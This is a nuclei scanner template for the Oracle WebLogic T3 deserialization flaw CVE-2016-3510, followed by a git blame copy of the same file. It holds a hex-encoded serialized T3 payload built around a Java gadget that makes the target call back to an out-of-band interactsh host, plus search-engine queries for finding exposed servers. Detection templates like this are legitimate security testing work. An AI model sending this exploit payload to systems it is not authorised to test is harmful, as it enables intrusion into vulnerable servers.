nuclei-templates/network/cves/2016/CVE-2016-3510.yaml

id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization -  Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.03351
    epss-percentile: 0.91456
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp
variables:
  start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
  end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:7001"

    read-size: 4
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a004730450220249734c4ffaf01327913e598f9c62ff98446ffee85dcdfdb4af8dfb53fe03782022100be0f48fd1c9ffe208aa0dd7ab36cccf7983c13eb3c4d75cb85b7e5573f2b5199:922c64590222798bb761d5b6d8e72950
Create CVE-2016-3510.yaml 2023-05-18 06:00:51 +00:00			`id: CVE-2016-3510`

			`info:`
updated info 2023-05-18 14:18:04 +00:00			`name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution`
Create CVE-2016-3510.yaml 2023-05-18 06:00:51 +00:00			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
updated info 2023-05-18 14:18:04 +00:00			`description: \|`
			`Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.`
Network Remediation - Update 2023-08-17 18:29:31 +00:00			`remediation: \|`
			`Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.`
Added Impact 2023-09-27 15:51:13 +00:00			`reference:`
			`- https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`- http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html`
			`- http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html`
			`- http://www.securitytracker.com/id/1036373`
			`- https://www.tenable.com/security/research/tra-2016-21`
Updated EPSS Score to CVE Templates Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-07-10 00:25:11 +00:00			`classification:`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Updated EPSS Score to CVE Templates Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2023-07-10 00:25:11 +00:00			`cvss-score: 9.8`
			`cve-id: CVE-2016-3510`
			`cwe-id: CWE-119`
misc update 2024-07-11 07:44:49 +00:00			`epss-score: 0.03351`
			`epss-percentile: 0.91456`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:::::::*`
updated info 2023-05-18 14:18:04 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`max-request: 2`
			`vendor: oracle`
			`product: weblogic_server`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- product:"oracle weblogic"`
			`- http.title:"oracle peoplesoft sign-in"`
			`fofa-query: title="oracle peoplesoft sign-in"`
			`google-query: intitle:"oracle peoplesoft sign-in"`
			`tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp`
Create CVE-2016-3510.yaml 2023-05-18 06:00:51 +00:00			`variables:`
			start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
			end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"

			`tcp:`
			`- inputs:`
misc update 2024-07-11 07:44:49 +00:00			`- data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"`
Create CVE-2016-3510.yaml 2023-05-18 06:00:51 +00:00			`read: 1024`

Added Impact 2023-09-27 15:51:13 +00:00			`- data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"`
misc update 2024-07-11 07:44:49 +00:00
Create CVE-2016-3510.yaml 2023-05-18 06:00:51 +00:00			`host:`
			`- "{{Hostname}}"`
Update CVE-2016-3510.yaml 2023-06-14 17:50:29 +00:00			`- "{{Host}}:7001"`
misc update 2024-07-11 07:44:49 +00:00
Create CVE-2016-3510.yaml 2023-05-18 06:00:51 +00:00			`read-size: 4`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`
Auto Template Signing [Thu Jul 11 07:47:01 UTC 2024] :robot: 2024-07-11 07:47:01 +00:00			`# digest: 4a0a004730450220249734c4ffaf01327913e598f9c62ff98446ffee85dcdfdb4af8dfb53fe03782022100be0f48fd1c9ffe208aa0dd7ab36cccf7983c13eb3c4d75cb85b7e5573f2b5199:922c64590222798bb761d5b6d8e72950`